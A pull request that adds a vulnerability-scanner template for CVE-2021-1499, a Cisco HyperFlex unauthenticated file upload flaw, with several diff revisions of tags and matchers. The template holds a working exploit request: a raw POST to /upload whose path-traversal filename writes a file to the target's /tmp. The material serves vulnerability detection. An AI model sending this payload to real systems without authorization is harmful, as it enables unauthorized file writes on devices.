### PR TITLE
Create CVE-2021-1499.yaml

### DIFF
--- a/cves/2021/CVE-2021-1499.yaml
+++ b/cves/2021/CVE-2021-1499.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
-  tags: cve,cve2021,cisco,rce,oob
+  tags: cve,cve2021,cisco
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 5.3
@@ -23,9 +23,8 @@ requests:
         Accept: */*
         Accept-Encoding: gzip, deflate
         Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
-        Origin: https://{{Hostname}}
-        Connection: close
-        Referer: https://{{Hostname}}/
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}
 
         -----------------------------253855577425106594691130420583
         Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"

--- a/cves/2021/CVE-2021-1499.yaml
+++ b/cves/2021/CVE-2021-1499.yaml
@@ -1,0 +1,53 @@
+id: CVE-2021-1499
+
+info:
+  name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
+  description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
+  author: gy741
+  severity: medium
+  reference:
+    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
+  tags: cve,cve2021,cisco,rce,oob
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 5.3
+    cve-id: CVE-2021-1499
+    cwe-id: CWE-306
+
+requests:
+  - raw:
+      - |
+        POST /upload HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Accept-Encoding: gzip, deflate
+        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
+        Origin: https://{{Hostname}}
+        Connection: close
+        Referer: https://{{Hostname}}/
+
+        -----------------------------253855577425106594691130420583
+        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
+        Content-Type: application/json
+
+        MyPasswdNewData->/api/tomcat
+
+        -----------------------------253855577425106594691130420583--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+      - type: word
+        words:
+          - "result"
+          - "/tmp/passwd9"
+        condition: and

--- a/cves/2021/CVE-2021-1499.yaml
+++ b/cves/2021/CVE-2021-1499.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2021-1499
     cwe-id: CWE-306
-  tags: cve,cve2021,cisco,fileupload
+  tags: cve,cve2021,cisco,fileupload,intrusive
 
 
 requests:
@@ -48,6 +48,7 @@ requests:
 
       - type: word
         words:
-          - "result"
-          - "/tmp/passwd9"
+          - '{"result":'
+          - '"filename:'
+          - '/tmp/passwd9'
         condition: and

--- a/cves/2021/CVE-2021-1499.yaml
+++ b/cves/2021/CVE-2021-1499.yaml
@@ -2,18 +2,19 @@ id: CVE-2021-1499
 
 info:
   name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
-  description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
   author: gy741
   severity: medium
+  description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
   reference:
     - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
-  tags: cve,cve2021,cisco
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 5.3
     cve-id: CVE-2021-1499
     cwe-id: CWE-306
+  tags: cve,cve2021,cisco,fileupload
+
 
 requests:
   - raw:


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-1499

```
A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
```

Thanks.

- References: https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO